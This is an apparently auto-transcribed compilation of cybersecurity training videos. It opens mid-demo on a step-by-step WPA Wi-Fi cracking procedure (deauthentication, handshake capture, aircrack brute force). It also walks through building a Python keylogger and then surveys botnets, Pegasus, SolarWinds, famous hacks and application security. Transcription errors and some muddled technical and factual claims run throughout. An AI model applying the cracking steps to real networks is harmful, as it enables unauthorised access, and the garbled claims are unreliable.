handshake it says we have a valid WPA WPA2 Network Target selected and that the script can continue now to capture the handshake we have a couple of attacks a Dior air replay attack what this attack does is click the clients out of the network in return when they try to reconnect to the Wi-Fi as they are configured that way that when a client is disconnected it tries to reconnect it immediately it tries to capture a handshake file which in turn contains the security key which is necessary to initiate the handshake for our demo let's go with the second option that is the Dior air replay attack select a timeout value let's say we give it 60 Seconds and we start the script we can see it capturing data from the jio 24 Network and here we go we have the WPA handshake files once the handshake file is captured you can actually close this and here we go congratulations in order to capturing a handshake it has verified that a peak MK ID from the target network has successfully been captured this is the file that is already stored the dot cap file for the path we can let's say we can keep it in a desktop okay we give the path and the handshape file is generated we can already see a Target over here same jio 24 router with the BSS ID now if we return to its main menu we already have the handshake file captured with us now our job is to Brute Force into that handshake capture file the capture file is often encrypted with the security key of the Wi-Fi network if we know how to decrypt it we will automatically get the security key so let's go to the offline WPA WP to decrypt menu since you'll be cracking personal networks we can go with option one now to run the Brute Force tool we have two options either we can go with the air crack or we can go with the hashcad let's go with aircac plus crunch which is a Brute Force attack against a handshake file we can go with option two it can already detect the capture file that we have generated so we select yes the BSS ID is the one which denotes the jio 24 router so we're going to select yes as well the minimum length of the key for example it has already checked that the minimum length of a Wi-Fi security key which is a WPA to psk key will always be more than 8 digits and Below 64 digits so we have to select something in between this range so if we already know let's say that the password is at least 10 digits we can go with the minimum length as 10. and as a rough guess let's say we put the maximum length as 20. the character set that we're going to use for checking the password will affect the time taken to Brute Force for example if we already know that or we have seen a user use a password while connecting to the router as something that has only numbers and symbols then we can choose accordingly let's say if we go with only uppercase characters and numeric characters go with option seven and it's going to start decrypting so how aircrack is working right here you can see this passphrase over here the first five or six digits are a it starts working its way from the end from the last character it keeps trying every single combination you can see the last the fourth character from the right side the D it will eventually turn to E because it keeps checking up every single character from the end this will keep going on until all the single characters are tested and every single combination is tried out since the handshake file is encrypted using the security key that is the WPA Tookie of the router whichever passphrase is able to decrypt the handshake key completely will be the key of the Wi-Fi router this is the way we can Brute Force into Wi-Fi routers anywhere in the world cyber attacks are frequently making headlines in today's digital environment at any time everyone who uses a computer could become a victim of a Cyber attack there are various thoughts of cyber attacks ranging from fishing to password attacks in this video we'll look into one such attack that is known as botnet but before we begin if you love watching Tech videos subscribe to our Channel and hit the Bell icon never to miss an update to begin with let's take a look at some of the famous potent attacks the first one is Mirai botnet which is a malicious program designed to attack vulnerable iot devices and infect them to form a networker Bots that on command perform basic and medium level denial of service attacks then we have the Zeus bot specifically designed for attacking the system for Bank related information and data now let's see what exactly a botnet is botnet refers to a network of hijacked interconnected devices that are installed with malicious quotes known as malware each of these infected devices are known as Bots the hijacked criminal known as bot hoarder remotely controls them the bottle used to automate large scale attacks including Data Theft server failure malware propagation and denial of service attacks now that we know what exactly a button it is let's dive deeper into learning how important it works during the preparation of a bottleneck Network the first step involves preparing the botnet Army after that the connection between the botnet Army and the control server established and the end the launching of the attack is turned by the bot order let's understand through our illustration firstly we have a bot order that initiates the attack according to the control server commands the devices that are infected with the malware programs and begins to attack the infected system let's see some details regarding the preparation of the botnet army the first step is known as the prepping the botnet army the first step is creating a botnet is to infect as many as connected devices as possible this ensures that there are enough Bots to carry out the attack this way it creates Bots either by exploiting the security gaps in the software or websites or using phishing attacks they are often deployed through Trojan horses for the next step we have establishing the connection once it hacks a device as per previous step it infects it with a specific malware that connects the device back to the control bottom server a bot header uses command programming to drive the bot's actions and the last step is known as launching the attack once infected a bot allows access to admin level operation like Gathering and stealing of data reading and rewriting the system data monitoring user activities performing denial of service attacks including other cyber crimes now let's take a look at the important architecture the first type is known as client server model the client server model is a traditional model that operates with the help of a command and control center server and communication protocols like IRC when the bot order issues a command to the server it is then relayed to the clients to perform malicious actions then we have peer-to-peer model here controlling the infected Bots involves a peer-to-peer Network that relies on a decentralized approach that is the parts are topological interconnected and acts as both CNC servers that is the server and decline to the hackers adopt this approach to avoid detection and single point failure in the end we will see some points on some counter measure against botnet attacks the first step is to have updated drivers and system updates after that we should avoid clicking random pop-ups or links that we often see on the internet and lastly having certified antivirus anti-spyware software's and firewall installed into a system will protect against malware attack the internet is an endless source of information and data still in some cases we come across some occurrences like cyber attacks hacking force entry which may affect a Time on the web hi everyone and welcome to the simple learn Channel today we will discuss a topic that secretly records our input data that is known as e-loggers but before we begin if you like watching Tech videos subscribe to our Channel and hit the Bell icon to never miss an update to understand the key logging problem better let's take a look at an example this is June she works in a business firm where she manages the company's data regularly this is Jacob from the information Department who is here to inform her about some of the security protocols during the briefing she informed him about some of the problems a system was facing with which included slow reaction speed and unusual internet activity as Jacob heard about the problems with the system he thinks of the possibility what could be the reason behind these problems a system was facing with the conclusion that he came across was the key logging issue unknown to the problem her system was facing with she asked him about some of the details regarding it for today's topic we learn what exactly keyloggers are and how they affect our system what are the harmful effects that key logging can bring into the system to begin with we learn what exactly the key logging program is as the name suggests keylogger is a malicious program or a tool that is designed to record keystrokes that are typed during data input and record them into a log file then the same program secretly sends these log files to its origin where they can be used for malicious acts by the hacker now that we know what the key logging program is let's take a look how they enter into the system searching for a suitable driver for a system can often lead to the installation of the key logging program into the system if we often visit suspicious sites and uncertified software are installed into a system then if we use unknown links or visiting unknown websites which come through unknown addresses can also be a reason behind a key logging issue entering into the system and lastly there are often cases where different pop-ups that we often see on social sites or different media sites can lead to the installation of key logging program into a system now that we know how the problem gets into the system let's take a look how to identify whether the system is infected by the key logging issue the key logging issue can be identified if there are often cases when a keyboard lags behind the system the data that we enter sometimes is stuck in between when we type through the input then there are cases when the system freeze occurs unknowingly to what exactly could be the reason behind them and also there are delayed reaction time for different applications that run on the system and lastly there are different cases when we often see suspicious internet activity on the system that we don't know about this could lead to the identification of a problem into the system now we'll take a look at different types of key loggers that are present on the net which can harm our system differently the first problem that keyloggers arouse is API based the most common key logging case which uses apis to keep a log of the type data and share it to its origin for malicious purposes each time we press a key the key logger intercepts the signal and locks it then we have form grabbing based key loggers as the name suggests they are a best key loggers that store the form data that is if we often use web forms or different kinds of forms to enter different data they can be recorded into the system by the program and send it to its origin then we have kernel based keyloggers these key loggers are installed deeply into the operating system where they can hide from different antivirus if not checked properly and they record the data that we type on the keyboard and send it to its origin and lastly we have Hardware Key loggers these key loggers are present directly into the hardware that is they are embedded into system where they record the data that we type on the keyboard now let's take a look how hackers differentiate different type of recorded data and exploit them when hackers receive information about the target they might use it to Blackmail the target which may affect the personal life of the Target and also blackmail them for different money related issues then in case of company data that is recorded by the key logging program can also affect the economic value of the company in the market which may lead to the downfall of the company also in some cases the key logging program can also log data about military Secrets which may include nuclear codes or security protocols which are necessary to maintain the security of a country now let's take a look whether mobile devices get infected with the key logging issue or not in the case of hand devices infection of key loggers are low in comparison to the computer systems as they use on-screen keyboard or virtual keyboard but in some cases we often see different kinds of malicious programs getting installed into the hand device if we often visit different uncertified websites or illegal websites or torrent sites and also the device that is infected with the keynote issue or different kind of malicious program can often lead to the exploitation of data that includes photos emails or important files by the hacker or the Cyber criminal that installed a particular malicious program into the system now to prevent a system from getting infected by the key locking program let's take a look at different points the first point includes using of different antivirus softwares or tools which can prevent the entering of malicious program into the system then keeping system security protocols regularly updated is also a good habit and lastly using virtual keyboard to input our sensitive data which may include Bank details login details or different passwords related different websites now that we have some understanding about the topic of keyloggers let's take a look at the demo to further increase the knowledge about the topic for the first step we have to download some of the important libraries that are required into the system which is this Library now we'll run it the system says the library is already installed into the system now let's take a look what exactly modules are required from the particular Library from this Library we will import the keyboard module which will help us to record the data that we type on the keyboard now from the same we'll also import key module and The Listener module and also the logging module which will help us to record the data into a log file for the next part we'll write a piece of code that will allow us to save the data that is recorded by the program into our text file that will be named as key underscore log text file along with the date and time stamp let's take a look now we'll provide it with the file name that will be given as key log dot txt file and also so the part where the format of the data is recorded put the brackets over here contain the file name now we'll write the format in which the data will be recorded into the log file which will be given as the format would be the message and the timestamp which would be given as a long way the timestamp US percentage and ending it with the bracket now for the next step we will Design two of the functions that will be used into the program that will be termed as while press function and while release function let's take a look while press function would be a function that will come into play when the keyboard key has been pressed is pressed and this would go for the format that we designed in the above line and logging the Press key info or string file to be recorded into the log file now we'll design a function that is while release that will come into play when the Escape key has been pressed that is the program will terminate itself and the program will stop from running and in the end we require for the functioning of the program to Loop these functions that is while press and wildly leads to continuous cycle that will be going for while press and on release will contain while release function as listener and now this part would join the different threads and store them into the log file now that we have completed the code for the program let's run it foreign we have to wait for a moment so the program runs it now to verify the program let's open Notepad and on the notepad we'll write hello world which will be the basic whether the program is working or not let's take a look and we will go for the main page on Jupiter notebook and refresh the page go to the bottom over here we see the key log text that is a text file that we created let's open it and over here we have the data that is created as we started with Note then this is a Hello World part that we created just now which shows that the program we created is working properly now that we have reached the end of the module let's take a look at the summary firstly we learn what exactly key loggers are then we understood what different modes are present how the system get infected with the key logging problem then we learned how to detect the problem into our system then we learned what different types of key loggers are present on the net we also understood how hackers use the recorded data from the program and we also learned whether mobile devices get infected with the key logging problem or not and lastly we understood what different points can be taken to prevent the entering of the key logging problem into the system before we learn about the Pegasus platform let us understand what spyware is and it's working spyware is a category of malware that can gather information regarding a user or a device straight from the host machine it is mostly spread by malicious links via email or chat applications when a link with the malware is received clicking on this link will activate the spyware which allows the hacker to spy on all our user information but some spyware systems even clicking on the link isn't necessary to trigger the malicious payload this can ultimately cause security complications and further loss of privacy one such spyware system that is making the rounds in the tech industry today is Pegasus the Pegasus is a spyware system developed by an Israeli company known as the NSO group it runs on mainly mobile devices spanning across the major operating systems like the Apple's IOS on iPhone and the standard Android versions this is not a newly developed platform since Pegasus has existed since as early as 2016 a highly intricate spyware program that can track user location read text messages scan through mobile files access device camera and microphone to record voice and video Pegasus has all the tools necessary to enforce surveillance for any clan that wishes to buy its services initially the NSO group had designed the software to be used against terrorist factions of the world with more and more encrypted communication channels coming to the Forefront Pegasus was designed to maintain control over the data transmission that can be a threat to National Security unfortunately the people who bought the software had complete control over who how and up to what level they can put surveillance limits on eventually the primary clients became Sovereign Nations spying on Public Information that is supposed to stay private became really easy with this service multiple devices can be affected with the same spyware system to create a network information this network keeps feeding data to the host to understand how a network can be created let's know how a mobile device can be affected by Pegasus we all communicate with friends and family over instant messaging applications and email in some instances if you check your inbox on a regular basis you must have noticed that we received some spam emails that the mail providers like Gmail and Yahoo can just filter into the spam folder some of these messages bypass this filter and make their way into a person's inbox they look like generic emails which are supposed to be safe the Pegasus spyware targets such occurrences bypassing malicious messages and links which install the necessary Spy software on the user's mobile device be it Android or an iPhone this isn't unique to the email ecosystem since it's equally likely to be targeted by SMS Stacks WhatsApp Instagram or even the most secure messaging apps like signal and threema once the malicious links are clicked a spyware package is downloaded and installed on the device after the spyware is successfully installed the perpetrator who sent the payload to the victim can monitor everything the user does Pegasus can collect private emails passwords images videos and every other piece of information that passes through the device Network all this data is transmitted back to the central server where the primary spying organization can monitor the activities at a granular level this is not even surface level since complex spyware software like Pegasus can access the roots files on our mobiles these root files hold information that is crucial to the working of the Android and iOS operating systems taking such private information is a massive blow to the security and the privacy of an individual the information that may seem trivial like the name of your Wi-Fi connection or the last time you ordered an item from Amazon that indeed all valuable information this exploitation is primarily possible due to the zero day vulnerabilities known as bugs in the software development process the zero day bugs are the ones that have just been discovered by some independent security company or a researcher once they are found reporting these vulnerabilities to the developer of the platform which would be either Google for Android or Apple for iOS is the right thing to do however many such critical bugs make their way onto the dark web where hackers can use them to create exploits these exploits are then sent to innocent users with a link or a message like we had discussed before Pegasus was able to affect the latest devices with the all the security patches installed but some bugs are not reported to the developers or just cannot be fixed without breaking some core functionality these become the Gateway for spyware to enter into the system you can never be 100 safe but you sure can give it all in protecting yourself the one thing where Pegasus stands out is that zero click action feature usually in spam emails the malicious code is activated when the user clicks the malware link a user doesn't need to click the link in the new version of the Pegasus and a few other spyware programs once the message arrives in the inbox of WhatsApp Gmail or any other chat applications the spyware gets activated and everything can be recorded and sent back to the central server the primary issue with being affected by spyware as a victim is detection unlike crypto Miners and Trojans spying Services usually do not demand many system resources which makes them tough to detect after they have been activated since many devices slow down after a couple of years any kind of Performance Set due to such spyware is often attributed to poor software longevity by the users they do not check meticulously for any other causes that is causing the Slowdown when left unchecked these devices can capture voice and video from the mobile sensors while keeping the owner in the dark let's take a moment to check if we are well aware of the causes of such attacks how do users fall prey to such spyware programs a by installing untested software B by clicking on the third party links from email and messages see by not keeping the apps and phones updated or deep all of the above let us know your answers in the comment section below and we will revive the correct answer next week but what about the unaffected devices the vulnerable ones while we cannot be certain of our security there are a few things we can do to boost our device be it against Pegasus or the next big spyware on the market let's say we are safe now and we have the time to take the necessary steps to prevent a spyware attack what are the things we can go for a primary goal must always be to keep our apps and the operating system updated with the latest security patches the vulnerabilities that the exploits Target are often discovered by developers from Google and apple which send the security patches quickly this can be done for individual apps as well so keeping them updated is of utmost importance while the most secure devices have fallen prey to Pegasus as well a security patch from developers may help in minimizing the damage at a later stage or maybe negate the entire spyware platform altogether another big factor is the spread of malware is the trend of side loading Android applications using dot APK files downloading such apps from a third party website have no security checks involved and are mostly responsible for adware and spyware Innovations on user devices avoiding the side loading of apps would be a major step in protecting yourself we often receive spam emails or texts from people we may not know on social media they are accompanied with links that allow malware to creep into a device you should try to follow the trusted websites and not click on any links that redirect us to unknown domains spiver is a controversial segment in governance while the ramifications are pretty extreme in theory it severely impacts user privacy against authoritarian regimes sufficient resources and a contingent plan can alter the false veil of democracy altogether even if our daily life is rather simplistic we must understand that privacy is not about what we have to hide instead it portrays the things we have to protect it stands for everything we have to share with the outside world both rhetorically and literally hey everyone today we look at the hack which took the World by storm and affected multiple governments and corporations the solarwinds attack the global statistics indicate that upward of 18 000 customers have been affected potentially needing billions to recover the losses incurred before we have a look at this hack Make sure to subscribe to our Channel and hit the notification Bell to never miss an update from simpler the date is December 8th 2020. FireEye a global leader in companies specializing in cyber security released a blog post that got the attention of the entire IIT Community a software known as Orion which was developed by solarwinds incorporator had become a victim of a remote access Trojan or a rat the breach was estimated to be running since the spring of 2020 and went virtually unnoticed for months the reveals and the developers of the Orion software into a frenzy as they quickly released a couple of hot fixes for their platform in order to mitigate this threat and prevent further damage but how did this come into existence we first need to understand the platform which was responsible for this breach solo wins a software company based in Texas United States had developed a management platform known as Orion catering to corporations and governments worldwide Orion was responsible for the monitoring and management of ID Administration this included managing the client's servers virtualization components and even the organization's Network infrastructure that bought the platform solarwinds claims they have more than 300 000 clients including U.S government agencies and several Fortune 500 companies this entire chain can be classified as a supply chain attack in this variant of cyber crime the hackers Target relatively weaker links in an organization's chain of control and delivery these are preferability services rendered by a third party since there is no direct jurisdiction over it in this case the Orion platform was the primary target the culprit however was software updates the update server for solarwinds Orion had a malicious version attached with malware or a Trojan to be precise this was made possible since the code repository that handled the software updates was breached once the update server repository was compromised the source code of the applications became open to modification and malicious code found its way onto the software a remote access Trojan was attached to a potential update nicknamed the Sunburst update this update gave hackers backdoor access to any client that uses the correct version on its release many clients believe the update to be legitimate since it came from the right source and they had no reason to believe otherwise American government agencies were supposedly hit the hardest as the list of victims included the U.S departments of Homeland Security treasury and health several private companies like Cisco Nvidia and Intel were compromised according to a list published by the cyber security firm trusec most of the companies had issues quick updates to fix this vulnerabilities introduced by the software while the actual perpetrators have never been found it is believed that this was an act of cross-border corporate Espionage conducted by state-sponsored hackers either from Russia or China before we move forward let's take a recap of the things we learned category of malware was responsible for the solarwinds hack was it one a virus a remote access Trojan a spyware or a worm let us know your answers in the comment section right away and we will reveal the correct answer in a week coming to possible reparations the Biden government has launched a full investigation on the effects and the repercussions of this breach there are a couple of things that we as consumers must always tend to when working our way through the World Wide Web using a password manager is highly recommended which can generate secure alphanumeric passwords you must also use different passwords for different accounts thereby reducing the chances of a single point of failure should one of those accounts get breached usage of two-factor authentication applications is also encouraged since it acts as a safety net if hackers directly get a hold of our credentials clicking on unknown links transmitted via emails is also a strict no as is installing applications from unverified sources the solarwinds hack is estimated to cost the parent company nearly 18 million dollars as reparations making it one if not the biggest hacks in cyberspace history as recently as of July 2021 the hackers access some U.S attorneys Microsoft 365 email accounts as part of the attack criminal organizations like the FBI and CIA are determined to figure out the culprits responsible for this debacle however the intricacy and the full extent of the breach makes it a way more complicated job than it looks on paper the day is 26 February 2022 the world is hit with breaking news that Russian State tv channels have been hacked by Anonymous a hacktivist Collective and movement who have made a name taking part in multiple Cyber Wars in the past decade this was in response to the Russian aggression on Ukrainian territory in the hopes of annexation Anonymous hacked the Russian State TV networks to combat propaganda in Russia and highlight the damage to life meted out by the Kremlin and Ukraine they also hacked 120 000 Russian troops personal information and the Russian Central Bank stealing 35 000 bios this served as a clear indicator of how cyber War can change the momentum in battle something which people had never seen so closely so what is cyber War a digital assault or series of strikes or hacks against a country is sometimes referred to as a cyber War it has the ability to cause havoc on government and civilian infrastructure as well as disrupt essential systems causing State harm and even death in this day and age the internet plays a bigger role than just watching videos and learning content it is where you have your personal data and carry Financial transactions so rather than resorting to physical violence Cyber Wars become the new means to cause Havoc considering the vulnerability of the data passing through the internet in most circumstances cyber warfare involves the nation-state attacking another in certain cases the assaults are carried out by terrorist organizations or non-state actors pursuing a hostile nation's aim in June 2021 Chinese hackers targeted organizations like Verizon to secure remote access to their Networks stuxnet was a computer worm designed to attack Iran's nuclear facilities but evolved and expanded to many other industrial and energy producing sites in 2010. since the definition of cyber war is so vague the flying rules and sanctions based on digital assault is even tougher making the field of cyber warfare a lawless land not bound by any rules or policies there are multiple ways in which these attacks can be carried out a major category of Cyber attack is espionage Espionage entails monitoring other countries to steal critical secrets this might include compromising vulnerable computer systems with botnets or spear phishing attempts before extracting sensitive data in cyber warfare the next weapon in cyber war is sabotage government agencies must identify sensitive data and its dangers if it is exploited Insider threats such as disgruntled or irresponsible Personnel or government staff with ties to the attacking country can be used by hostile countries or terrorists to steal or destroy information by overwhelming a website with bogus requests and forcing it to handle them denial of service attacks prohibit real users from accessing it attacking parties may use this form of assault to disrupt key operations and systems and prevent citizens military and security officials and research organizations from accessing sensitive websites but what benefits does Cyber War offer in contrast to traditional physical Warfare the most important Advantage is the ability to conduct attacks from anywhere Global without having to travel thousands of miles as long as the attacker and Target are connected to the internet organizing and launching Cyber Wars is relatively less tedious Than Physical Warfare people living in or battling for a country are subjected to propaganda attacks in an attempt to manipulate their emotions and thoughts digital infrastructure is highly crucial in today's modern world starting from communication channels to Secure Storage servers crippling a country's footprint and control on the Internet is very damaging but what are some of the ways we as Citizens protect ourselves in the case of a cyber war in the unfortunate event that your country is involved in Warfare be sure to fact check every piece of information and follow only trusted sources in that frame of time even conversations online should be limited to a need to know basis considering propaganda campaigns have the power to influence the tide of War drastically it is highly crucial to follow basic security guidelines to secure our devices like regularly updating or operating systems occasionally running full system antivirus scans Etc if your country or organization is being attacked having devices segregated in a network goes a long way in bolstering security try to avoid sharing a lot of personal data online in this era of Instagram and Facebook divulging private information can be detrimental to keeping a secure firewall for your data the more information an attacker has access to the higher his chances of being able to devise a plan to infiltrate defenses in this video we bring you the top 10 computer hacks of all time but before we begin if you're new here and haven't subscribed already make sure to hit the Subscribe button and the bell icon for interesting Tech videos every day let's see what we have at number 10. from April 27 2007 Estonia the European country faced a series of cyber attacks that lasted for weeks this happened when the Estonian government decided to move the bronze soldier from Thailand Center to a less prominent military cemetery located on the city's outskirts unprecedented levels of internet traffic took down Estonian Banks online services media Outlets broadcasters and government bodies botnet sent massive waves of spam and vast amounts of automated Online requests according to researchers the public faced DDOS attacks there were conflicts to edit the English language version of The Bronze soldiers Wikipedia page as well although there is no confirmation Russia is believed to be behind these cyber attacks that largely crippled the Estonian Society let's now move on to the next attack on December 23 2015 several parts of Ukraine witnessed a power outage and this was not a typical blackout it was indeed the result of a Cyber attack Information Systems of three energy distribution companies in Ukraine were compromised it is the first known Victorious Cyber attack on a par grid it is said that here hackers send talk phishing emails to the power companies 30 substations were Switched Off and about 230 000 people were left in the dark for about one to six hours U.S investigators believed that russia-based hackers were responsible for this experts have warned that other countries could also be vulnerable to such attacks let's see what we have at number eight in the year 1999 a Cyber attack cost a 21-day shutdown of NASA computers unbelievable isn't it the hacker was none other than the then 15 year old Jonathan James he first penetrated U.S Department of Defense divisions computers and installed a back door on its servers this allowed him to intercept more than a thousand government emails including the ones containing usernames and passwords this helped James steal a piece of NASA software and crack the NASA computers that support the International Space Station which cost a space exploration agency's forty one thousand dollars as systems were shut down for three weeks he was the first person to carry out a computer hack against the American space agency let's now move on to the next attack in late November 2014 there was a leak of confidential data from the film studio of Sony Pictures information about Sony Pictures employees their emails copies of the then unreleased Sony films future propositions and other crucial data were leaked this Cyber attack was carried out by a hacker grouped named Guardians Of Peace so what did the hackers want well they demanded that Sony withdraw its then upcoming movie the interview this movie was a comedy storyline to assassinate the North Korean leader Kim Jong-un Sony then decided to cancel the film's theatrical release due to their threats at Cinema screening the movie it is indeed hard to trace the roots of a Cyber attack in this case after evaluation the U.S intelligence officials arrived at the theory that the attack was in a way related to the government of North Korea however North Korea had denied the same moving on to our number six in December 2006 TJX the U.S retailer company identified that 45.6 million debit and credit card details were stolen this happened from one of its systems over 18 months by an unknown number of intruders it was one of the first largest ever cyber attacks involving the loss of personal data as a result banks in the affected regions had to reissue and block thousands of payment cards a group of hackers did this Albert Gonzalez being The Mastermind the group was from Miami the place where the TJX Heist was believed to have originated reports said that the TJX data breach occurred because of weak web encryption at two of its martial stores in Miami next moving on to our top five let us see what we have at number five the year 2010 witnessed the discovery of the deadly computer worm stuxnet this malware's motive was unlike any other usual cyber attacks it aimed at destructing the equipment the computers controlled stuxnet came with the deadly purpose of damaging Iran's nuclear infrastructure it infected more than 200 000 computers including 14 Industrial sites and a uranium enrichment plant in Iran stuxnet initially spread via Microsoft Windows and targeted Siemens industrial control systems although it was discovered only in 2010 It is believed to have been silently sabotaging Iran's nuclear facilities it was one of the first discovered malware that was capable of hampering hardware systems it largely damaged the centrifuges of the Iranian reactors this is believed to be a cyber weapon created by the US and the Israeli intelligence although there is no documented evidence or acceptance by either of the countries for the same moving on to number four in the year 2014 Home Depot was the victim of one of the deadliest cyber attacks 56 million payment cards were compromised along with 53 million customer email addresses stolen this security breach happened from April to September 2014. criminals were believed to have used a third-party vendors username and password to enter the perimeter of Home Depot's Network the attackers were then able to deploy custom-built malware on its self-checkout systems in the US and Canada moving on to our top three as you might be aware the PlayStation gaming system is one of Sony's most popular products unfortunately in April 2011 Sony Executives witnessed abnormal activity on the PlayStation Network this resulted in the compromise of approximately 77 million PlayStation users accounts and prevented users of PlayStation 3 and PlayStation Portable consoles from accessing the service this forced Sony to turn off the PlayStation Network on April 20th on May 4th Sony confirmed that personally identifiable information from each of the 77 million accounts had been exposed the outage lasted for 23 days Sony released almost daily announcements concerning the system outage in the end Sony is believed to have invested approximately 170 million dollars to improve the network security to investigate the attack and to cover the expenses of caring for the consumers that had been affected let's now move on to the next attack at number two in May 2017 one of the most dangerous cyber attacks took place it was known as the wannacry ransomware attack caused by the wannacry cry crypto worm the victims were the users that used the unsupported version of Microsoft Windows and those who hadn't installed the new security update this did not take place through phishing like other attacks but through an exposed vulnerable SMB port the attack originated in Asia and then eventually spread across the globe in a day more than 200 000 computers were infected across 150 countries the wannacry cry crypto worm locked the users out of their targeted systems and encrypted their data the users were asked for a ransom of 300 to 600 dollars which had to be paid via Bitcoin in exchange for their data this attack took a toll on both private and government organizations it resulted in Damages from hundreds of millions to billions of dollars in a matter of few days the emergency patches released by Microsoft halted the attack also the discovery of a kill switch prevented the infected computers from spreading the crypto worm Security Experts in a few countries believed that North Korea was behind this attack and finally let's see what we have at number one more than two decades ago in March 1999 the Melissa virus a mass mailing macro virus was released a targeted Microsoft Word and outlook-based systems and created considerable Network traffic Melissa virus infected computers via emails the email would look like an important message well yes it was fake if the recipient opens the attachments in the mail and downwards the document and then opens it with Microsoft Word a virus was released on their computers this would then Mass mail itself to the first 50 people in the victim's contact list and then disable multiple Safeguard features on Microsoft Word and Microsoft Outlook this began spreading like a wildfire across the internet David L Smith released the virus the virus cost nearly 80 million worth of Damages it did not steal data or money however it cost a Havoc almost 1 million email accounts were disrupted worldwide agencies were overloaded and some had to be shut down entirely and internet traffic in some locations were slowed down security was traditionally considered an afterthought in software development it is becoming an increasing important concern for all aspects of app development from design to deployment and Beyond the number of programs produced distributed deployed and patched across Network continually increases as a result application security features must deal with a wide range of risks let's take an example a malicious script may be mirrored on the victim's web browser or kept in a database and run whenever the user contacts the proper function depending on the kind of attack in question here this allows malicious code to be entered in the case of an output the major cause of this attack is faulty user input validation which allows malicious input to enter the final output an evil user can enter a script that will be injected into the website's code the browser will then be unable to determine whether the process code is harmful as a result a malicious script is performed on the victim's browser or a focus form is shown to the users are you aware of which attack this is if not do stay till the end to find the correct answer are you aware of which attack this is if not please stay till the end of the video to know the correct answer hey everyone welcome to today's video on application security before we move forward subscribe to our Channel and hit the Bell icon to never miss an update from us let's take a look at the topics to be covered today we start by learning about application security and its different times we learn about the most common vulnerabilities in app set followed by the importance of application Security in today's cyber security space next we cover some attacks against application layer security and end the video with subtraction techniques to enforce application security parameters so let's start by learning about application security from a Grassroots perspective application security which is often known as app set protect application software from external security threats by utilizing security software Hardware methodologies best practices and different processes organizations require application security technologies that Safeguard all of their programs from internal to popular external apps on consumer mobile phones these Solutions must address the whole development cycle and provide testing after an application has been deployed to detect possible issues application security mechanism is capable of testing web pages for possible and exploitable vulnerabilities analyzing code and assisting the administration of development and Safety Management processes the testing Solutions must also be simple and easy to install for system administrators worldwide consumers utilize hundreds of applications daily to access theoretically important and favored services such as e-commerce banking music Etc to be productive these professionals use a variety of software Solutions as well ranging from online word Checkers to tablet based creative tools among other things back-end software of course exists to automate essential operations and processes and decreases human labor but to make matters worse the quantity and complexity of these apps and their backend code is increasing the software security problem 10 years ago was about securing desktop apps and static web pages that were natively harmless and easy to scale through and Define because of Outsource development the number of Legacy programs and in-house development that uses third-party open source and commercialized off-the-shelf software modules the software supply chain has become considerably more convoluted now that we understand application Security on a general level let us go through some of the different categories for the types of application security the three major types to be covered in this section web application security API security and Cloud native application security a web application is a program available to the internet and it operates on a web server the client is accessed using a web browser the applications by definition must allow connections from clients across unsecured Network this exposes them to a variety of risks many online apps are mission critical and include sensitive customer data making them an attractive Target for attackers and a top concern for any cyber security program or framework the Advent of https which offers an encrypted channel of communication guards versus man in the middle attacks or mitm attacks has addressed several online application weaknesses many weaknesses though still persist many security providers have created Solutions specifically geared to safeguard online applications in response to the rising challenge of web application security a web application firewall is an example of a security technology meant to identify and provide application layer salts in the case of web applications when it comes to apis apis are of security flaws are the root of many major data breaches they have the potential to reveal sensitive data and disrupt vital corporate processes API security flaws include unsufficient authentication unintended data disclosure and a failure to apply rate restriction which allows API abuse the requirement for API security like the necessity for web application security this led to the creation of sophisticated equipment that can discover API vulnerabilities and protect apis in production level the third type is cloud native application security infrastructure and environments are often built up automatically in Cloud native apps depending on declarative configuration which is known as infrastructure as core or IEC developers are tasked to developing declarative settings and application code both of which should be secure because practically everything is defined during the development stage shifting left is even more crucial in Cloud native setups traditional testing techniques can help Cloud native apps but they are insufficient dedicated Cloud native Security Solutions are mandatory at this point of time which are capable of instrumenting vessels container clusters and serverless operations reporting on security concerns and providing developers with a quick feedback loop now that you have covered the different types of application security let us go through some of the most common vulnerabilities that these Frameworks face on a daily basis first is cryptographic failure when data is not adequately safeguarded in transit and addressed cryptographic failures which are formerly known as sensitive data exposures account it has the potential to reveal credentials health information credit card details and personal information as well depending on the type of data being protected in that particular case injection attacks six attackers can use injection vulnerabilities to convey malicious information to a web application interpreter it has the potential to assemble and execute this data on the server SQL injection is a popular type of injection which I've already covered in an introduction for this video another major vulnerability are outdated components vulnerable and out of trade components Encompass any vulnerability caused by obsolete or unmaintained software it can happen if you construct or even use an application without first learning about its core components and versions authentication failures identification and authentication failure which are previously known as broken authentication Encompass any security issue involving user identities identity attacks and exploitation may be avoided by implementing secure session Administration authentication and validation for all identities in their organization in the next section let us cover some of the protection mechanisms employed by cyber security firms and third-party automated software to prevent the application layer from being bombarded with SQL injections and other attacks the first is a web application firewall or Waf a web application firewall monitors and filters HTTP traffic within a web application and the World Wide Web application firewall architecture does not address all risks but it may be used in conjunction with other defense mechanisms it can be used to the portfolio of Security Solutions to provide a comprehensive defense against diverse attack roads it is a protocol layer 7 protection in the open systems interconnection or the OSI model paradigm that helps different online application against attacks such as cross-site scripting cross-site fraud skill injection and file infusion unlike a proxy server which conceals the identity of client computers by an intermediary a web functions as a reverse proxy shielding the server from exposure it acts as a barrier in front of a web application protecting it from the internet so clients must pass through the web application firewall before they can access the application the second is threat assessment a list of sensitive assets to save card will assist you in understanding the threat to your firm and how to minimize them considering how a hacker can infiltrate an application if existing security protections are in place and whether additional tools or defense capabilities are required it's also crucial to keep your security expectations in check nothing is impenetrable even if the most stringent security measures it would be best if you were realistic about what you believe your team can handle in the long term when pushed to aggressively safety regulations and procedures might be disregarded remember that safety is a lengthy and time taking project that requires the collaboration of other employees and sometimes even your customers the next topic is privilege management limiting privileges is vital especially for Mission critical and sensitive systems the least privileged principle states that access to programs and data should be limited to those who require them when they require them for two reasons the least privileged principle is absolutely critical the first is that hackers May compromise less privileged accounts and ensuring they do not acquire access to highly sensitive systems is critical the second is that internal digits are equally harmful as external adversaries if insiders go bad it's critical to ensure they never have more power than they need minimizing the harm that they may be able to cause to the organization network security is a set of technologies that protects the usability and integrity of a company's infrastructure by preventing the entry or proliferation within a network it architecture comprises of tools that protect the network itself and the applications that run over it effective network security strategies employ multiple lines of defense that are scalable and automated each defensive layer here enforces a set of security policies which are determined by the administrator beforehand this aim sets equal to the confidentiality and accessibility of the data and the network the every company or organization that handles a large amount of data has a degree of solutions against many cyber threats the most basic example of network security is password protection it has the network the user chooses the recently network security has become the central topic of cyber security with many organizations involving applications from people with skills in this area it is crucial for both personal and professional networks most houses with high-speed internet have one or more wireless routers which can 